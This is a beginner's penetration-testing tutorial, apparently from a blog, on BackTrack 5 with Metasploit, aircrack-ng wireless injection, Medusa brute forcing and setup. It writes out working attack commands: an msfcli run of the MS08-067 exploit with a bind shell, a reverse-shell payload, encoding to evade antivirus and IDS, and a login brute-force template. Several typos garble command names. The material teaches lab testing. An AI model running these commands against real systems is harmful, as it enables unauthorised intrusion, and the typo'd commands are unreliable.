Metasploit Tutorial: Introduction

Metasploit Tutorial: Introduction

1. Metasploit Terms
2. MSFconsole
3. MSFcli
4. Armitage
5. MSFpayload
6. MSFencode

Metasploit is a valuable tool in pen testing a network. However, it can be very confusing for a beginner. These metaspolit tutorials will help you get up and running with metasploit. Most of our hacking will be targeted to windows machines. As a reminder and site disclaimer: I am not responsible for your actions! This is for education only!
Recommended Reading: Metasploit: The Penetration Tester’s Guide
A Book that will show you most of the metasploit framework. However, it leaves you to discover the true power of metasploit for yourself. Overall, highly recommended Air Sealed Tent.

Metasploit Terms

Exploit – to take advantage of a security flaw within a system, network, or application.
Payload – is code that our victim computer to execute by the metasploit framework.
Module – a small piece of code that can be added to the metasploit framework to execute an attack.
Shellcode – a small piece of code used as a payload.

MSFconsole

Msfconsole is an all-in-one interface to most of the features in metasploit. Msfconsole can be used to launch attacks, creating listeners, and much, much more. We will be using Msfconsole throughout these tutorials, but mastering it will allow you to keep up with metaspolits rapidly changing framework. Metasploit comes installed by default on backtrack 5. To access msfconsole, open your console and type:
root@bt: ~# cd /opt/framework3/msf3/
root@bt: ~#/opt/framework3/msf3# msfconsole
After sometime, the msfconsole will boot.
To view the help files, simply type help followed by the command you want to know more about. In our case, we want to learn about the connect command. The connect command allows us to communicate with a host.
msf > help connect

MSFcli

Msfcli is another way to access the metasploit framework but focuses more on scripting and interpretability with other console-based tools. To view the msfcli help type:
root@bt:~# cd /opt/framework3/msf3
root@bt:~# msfcli -h
Now we are going to do a little test run of msfcli. It’s important to note whenever you’re learning metasploit and you get stuck, you can see the options in a module by adding the letter O to the end of the line. For example:
root@bt:~# msfcli windows/smb/ms08_067_netapt o
This module requires three options: RHOST, RPORT, and SMPIPE. Adding P to the end allows us to see what payloads we can use.
root@bt~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.101 P
we can run our exploit by selecting a payload, fill out the options, and run it by passing the letter E to the ned of the msfcli argument string.
root@bt~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.101 PAYLOAD=windows/shell/bind_tcp E

Note: the IP address assigned to RHOST is a windows XP machine that I have on a virtaul machine. It will act as our victim machine for testing. You will have to do the same with another computer or a virtual machine. For practice, do not update your victim machine or install anti-virus. We want to be able to use our exploits without them being patched over with windows updates. We will go over this more in-depth later on.


The armitage component is a fully interactive graphical user interface.

Running Armitage

1. Run the command armitage.
2. Select Start MSF.

MSFpayload

The msfpayload component of metasploit that generates shellcode, and executables. Shellcoe can bew generated in many formats including C, Ruby, JavaScript and even Visuabl Basic. Each output will be useful in various situations.
For msfpayload help type: root@bt~# msfpayload -h
Just like msfcli, if you need to find out the required options, append the letter O on the command line.
root@bt:~# msfpayload windows/shell_reverse_tcp O

MSFencode

The shellcode generated by msfpayload is functional, but it contains several null characters that, when interpreted by many programs, signify the end of a string, and this will cause the code to terminate before completion.
In addition, shellcode traversing a network in cleartext is likely to be picked up by intrusion detection systems (IDSs) and antivirus software. To address this problem, Metasploit’s developers offer msfencode, which helps you to avoid bad characters and evade antivirus and IDSs by encoding the original payload in a way that does not include “bad” characters.
Enter msfencode -h to see a list of msfencode options.
Metasploit contains a number of different encoders for different situations. Some will be useful when you can use only alphanumeric characters as part of a payload, as is the case with many file format exploits or other applications that accept only printable characters as input, while others are great general purpose encoders that do well in every situation. A very popular and well known encoder is the: x86/shikata_ga_nai encoder.
To see the list of encoders available, append -l to msfencode as shown next. The payloads are ranked in order of reliability.
root@bt:~# msfencode -l

Packet Sniffing and Injecting in Backtrack

Introduction:
This is a multi-part tutorial that will show you the tools of wireless attacks and penetration testing.

Required Hardware:

Most of this isn’t really required, but will be helpful on your hacking adventures.

• A laptop or two. One laptop will act as the penetration tester and the other will be the victim. Of course if you do not have two laptops you can use a desktop with virtual machines, which is what we will be doing for these lessons.
• One Alfa wireless adapter. This is sort-of required because the Alfa adapter will support packet injection and sniffing out as well as work with Backtrack right out of the box.
  Alfa AWUS036H USB Wireless Long-Rang WiFi network Adapter with 5dBi Antenna
• A wireless router that we can use.
  D-Link DIR-601 Wireless-N 150 Router

• And finally, a connection to the internet.

Recommended Reading: BackTrack 5 Wireless Penetration Testing Beginner’s Guide
This book covers a lot of the topics you’ll find on this site. However, it goes into much more depth. It goes in easy to follow, simple, step by step lessons. Highly recommended for anyone starting out in wireless security/hacking.

Tutorial 1: Setting up your wireless card.
Plug in the wireless adapter into your laptop’s USB port.
Log in, open up the console and type: iwconfig.The iwconfig command lists all wireless interfaces on your machine. In my case, I have my Alfa One adapter connected as wlan0. Typing iwconfig wlan0 will display more information about your wlan0 interface. The mac address that is displayed should match up with the MAC address written on the back of your wireless adapter.
Now to put your wireless adapter into a monitor mode interface. To do this, simply type: airmon-ng start wlan0. The monitor interface will be named mon0.
Tutorial 2: Getting networking on BackTrack
By default, backtrack does not boot with working networking, this is to increase its stealth when penetration testing. The easiest way to get networking is using the WICD Network Manager. Click Applications -> Internet -> WICD Network Manager. Then select your wireless access point and connect.
If you receive and error message that says “Could not connect to wicd’s D-Bus interface. Check the wicd log for error message.” then simply enter the following commands into your terminal:
root@bt:~# dpkg-reconfigure wicd
root@bt:~# update-rc.d wicd defaults

Then restart your machine and the error should not occur anymore.

Packet Sniffing and Packet Injecting

WLAN Frames:

1. Management frames: Management frames are responsible for maintaining
   communication between the access points and wireless clients.
2. Control frames: Control frames are responsible for ensuring a proper exchange of
   data between the access point and wireless clients.
3. Data frames: Data frames carry the actual data sent on the wireless network. There
   are no sub-types for data frames.

Packet Sniffing with Wireshark

Open wireshark by navigating the application menu or by typing “wireshark” in the console.

Once WireShark is open, Click Interface List (1). A second window will open with a list of interfaces that can capture packets. Notice our monitor device mon0 is there from when we set it earlier. Click on start (2) and WireShark will begin to capture packets and display them in the window. These are wireless packets which your wireless card (in my case the Alfa One Adapter), are sniffing out of the air.

Now lets sniff packets from our own access point. To do this, we are going to use airodump-ng. Airodump-ng is used to capture wireless packets which have WEP encryption with the idea that you will use aircrack-ng (don’t worry, we’ll get to that soon). But for this time around, lets turn off the encryption on our wireless access point.

Now open up the terminal and type:
airodump-ng --bssid 5C:D9:98:6A:64:8A mon0

Note: 5C:D9:98:6A:64:8A is the MAC address of my wireless access point. To find yours, go to your wireless routerweb interface and look for status. There you should find the wireless mac address of your router.

After airodump-ng finishes, you will see your access point with the channel it is running on.

Now we have to lock on to our access point by setting our wireless card to the channel of our access point. To do this, type:

iwconfig mon0 channel 6
(Where “6” is the channel of your access point.)

Now fire up wireshark, sniff for packet with your mon0 interface. Now type in the filter box:

(wlan.bssid == MAC ADDRESS HERE) && (wlan.fc.type_subtype == 0x20)

Now we will be sniffing only data packets from our access point.

Packet Injecting

First we want to see only non-beacon packets in wireshark. So open wireshark and type in your filter box:

bssid == 5C:D9:98:6A:64:8A) && !(wlan.fc.type_subtype == 0x08).

Note: Replace 5C:D9:98:6A:64:8A with your own mac address.

Then open the terminal and type:

aireplay-ng -9 -e "Hack Lab" -a 5C:D9:98:6A:64:8A mon0

Note: Replace Hack Lab with the name of your SSID and 5C:D9:98:6A:64:8A with your own mac address.

If you go back to wireshark, you should see some packets that were injected. These are just random packets that do not have any real effect.

Medusa and commands in Backtrack

Medusa

Medusa is a log-in brute forcer that attempts to gain access to remote services by guessing at the user password. Medusa is capable of attacking a large number of remote services including FTP, HTTP, MySQL, Telnet, VNC, Web Form, and more. In order to use Medusa, you need several pieces of information including the target IP address, a username or username list that you are attempting to log in as, a password or dictionary file containing multiple passwords to use when logging in, and the name of the service you are attempting to authenticate with.
Medusa comes installed on Backtrack 5. However, if you are using a different version of backtrack without Medusa type:
apt-get update
apt-get install medusa
When using online password crackers, the potential for success can be greatly
increased if you combine this attack with information gathered from reconnaissance and scanning. An example of this is when you find usernames, passwords, and email addresses. Programs like Medusa will take a username and password list and keep guessing until it uses all the passwords. Be aware that some remote access systems employ a password throttling technique that can limit the number of unsuccessful log-ins you are allowed. Your IP address can be blocked or the username can be locked out if you enter too many incorrect guesses.
Backtrack includes a few word lists that you can use for your brute forcing adventures. You can find one list at:
/pentest/passwords/wordlists/

In order to execute the brute-force attack, you open a terminal and type the following:

medusa –h target_ip –u username –P path_to_password_dictionary –M service_to_attack
“-h” is used to specify the IP address of the target host. The “-u” is used for a single username that Medusa will use to attempt log-ins. “-P” is used to specify an entire list containing multiple passwords. The “-P” needs to be followed by the actual location or path to the dictionary file. The “-M” switch is used to specify which service we want to attack.

Here I launch an attack against my own ssh server.

More to come!

Updating and Linux Commands

Before we can begin hacking away with Backtrack, we first must do a little updating. Backtrack is contains a ton of programs and frameworks such as Metasploit, which is constantly updated. You may have to update your tools two or three times a week. Also, if you are new to Linux operating systems, you will have to learn how to use the terminal and basic Linux commands. So let’s get started.

Updating Backtrack 5

Since Backtrack is based on Ubuntu 10.04 (which is based on Debian), it has the apt-get  command. Apt-get is a powerful command-line tool that is used for installing new software packages, updating, and even upgrading the operating system. We will use this command to get the latest version of Backtrack. After logging in to Backtrack, open a terminal (Applications > Accessories > Terminal):
Then issue the following command:
root@bt:~# apt-get update && apt-get upgrade && apt-get dist-upgrade
The command will then select all the new updates for Backtrack, and after a short time it will ask you to continue. Press ‘y’ for yes.
If you just installed Backtrack, this update will take about 15-20 minutes. Keep an eye on the console for when it asks “Do you want to continue?”. Again, press ‘y’ for yes. You will want to run the command apt-get upgrade && apt-get upgrade once a week to keep Backtrack up-to-date.

Linux Commands

There are many Linux commands, and they can be used in various combinations. I will list a the basic ones which you should learn if you are new to Linux and Backtrack. Most commands can have parameters which gives them added functionality. To see the parameters, or to learn what a command does, add -h or –help after them.
(Example: cat –help).

• cat – This is command is short for “Concatenate” and prints out the standard output
  Example: cat filename
• cd – Change Director. Switches the current directory you are in.
  Example: cd foldername
  Example: cd root/Desktop/
• clear – clears the terminal screen.
• ls – List the files and folders within the current directory. (Note that is ‘L’ not ‘i’)
• mkdir – Make Directory. Create a new directory of the given name
  Example: mkdir myFolder
• ping – Send a packet to a host and waits for a response.
  Example: ping -c 4 google.com (The -c 4 parameter limits the ping to 4 counts).
• rm – Remove. Removes a file or folder.
  Example: rm filename

How to Install Backtrack 5

Download the Backtrack 5 ISO

Head over to: http://www.backtrack-linux.org/downloads/
Then click the download button.

After that, you will be able to pick the version of backtrack that you want. I am going to recommend Backtrack 5 R3 since it is the most up-to-date. The window manager is up to you, but I am going to use gnome. Since I will be using backtrack in a virtual machine, the 32 bit version will be fine. We want the ISO because we can use it on a DVD, a USB flash drive, and install on a virtual machine. Direct download or torrent download is up to you. The file is little over 3 GBs, so it may take some time depending on your internet speeds.

Setting up a Virtual Machine

A virtual machine (VM) is the software implementation of a physical computer. In other words, it’s having another computer on your current computer. If you have never used a virtual machine it is a good time to start. VMs are excellent when it comes to practice labs which we will get to in another section.
To start, you’re going to need to get VM software. There are many out there, but I will list a few popular ones.

1. VMware Workstation 9 (Windows/Linux) – $249.00 USD
2. VMware Player (Windows/Linux)  – Free
3. VirtualBox (Windows/Mac/Linux) – Free

Whichever VM software you go with, make sure it has a way to network with other VMs. If you don’t want to spend the money, go with VirtualBox. If you plan to get serious with penetration testing, you might want to consider getting a VMware Workstation license. It is full of useful tools and goodies such as sharing VMs and remote access and easy to work with.
I will be use VMware Workstation, but these programs are very similar in function. You shouldn’t have trouble following along if you are using something else.
After everything is installed and running, click “Create new virtual machine”.

Next you’re going to select “Installer disc image file” then browse for the backtrack 5 ISO.

Select the operating system as linux, and the version as Ubuntu.

Give the virtual machine a name such as “Backtrack 5 R3” and select a location for where you want to save the virtual machine files.

When asked how much you want the virtual disk drive to be, you want at least 25 GB. This will be the most demanding requirement of Backtrack 5. I went and used 40 GB for my virtual machine. Although the backtrack-linux wiki says you need at least 20 GB, I found you will run out of space by the time you install updates or any other software. Then, you will have the option of storing the virtual disk as a single file, or split into multiple files. Creating a virtual disk as a single file will allocate all of the space right away. Splitting into multiple files means the drive files will grow as you need them. So if your hard drive space is limited on your host system, go with multiple files. If you have a massive drive, and not worried about space, go with a single file.

And that’s it! The virtual machine is ready to go. I left mine at 1 GB of ram, if you are limited of memory, you can change this in the virtual machine settings. The recommended minimum memory is 512 MB, however you can try lower if you need to.

Power on the virtual machine and you will be ready to install Backtrack.

Installing Backtrack 5

If you are installing on a hard drive, you will need to burn the Backtrack 5 ISO on to a DVD or a USB Drive. For directions on installing to a USB Drive, see here (link).
First turn on your machine, then insert your DVD or USB Drive. Then press the key that allows you to select your boot drive. You may have to go into the bios to enable this. Most often, F12 will work. Select either your DVD drive, or your USB Drive to boot from it. You should see a screen like this:

After a few moments, you will see Backtrack Live CD menu. Press enter on Backtrack Text – Default Boot Text Mode.

Wait about 10 seconds, and you will come to Backtrack shell console. Type the command “startx” to load the GUI.

After another few moments, you will come to the desktop of Backtrack. Double click on the “Install Backtrack” to begin the install process.

After you select your time zone, and language, you then have to partition your drive. If you are using a virtual machine, go ahead and use the whole drive. If you are dual booting, you will have to specify your partition for your two operating systems.

Continue through the installer, and then click finish. Backtrack will then install on to your system. This process takes about 10-15 minutes.

After it is finish, restart your system.

Backtrack 5 Login

After restarting, you will come to a login screen like this:

The default root name for Backtrack is “root” and the password is “toor”. After typing in the root username and password, you will come back to the Backtrack shell. Type “startx” to enter the GUI desktop.

Creating a Bootable USB Drive

Required Items:

• A USB flash drive with minimum space of 4 GB.
• Backtrack 5 ISO
• UNetbooin – http://unetbootin.sourceforge.net/

UNetbootin is a program that allows you to create bootable USB drives for linux distros and Windows. UNetbootin will download the distribution or use an ISO file you selected from your hard drive.

1. Once UNetbootin is downloaded you can run it by double clicking (Windows)
2. Plug in your USB Drive.
3. Start UNetbooin and select the “diskimage” option, then select your Backtrack 5 ISO.
4. Select your USB Drive, then click “OK”.
   WARNING: This will format your USB Drive and remove all previous data.

Now you should be able to boot off of your USB Drive with Backtrack 5.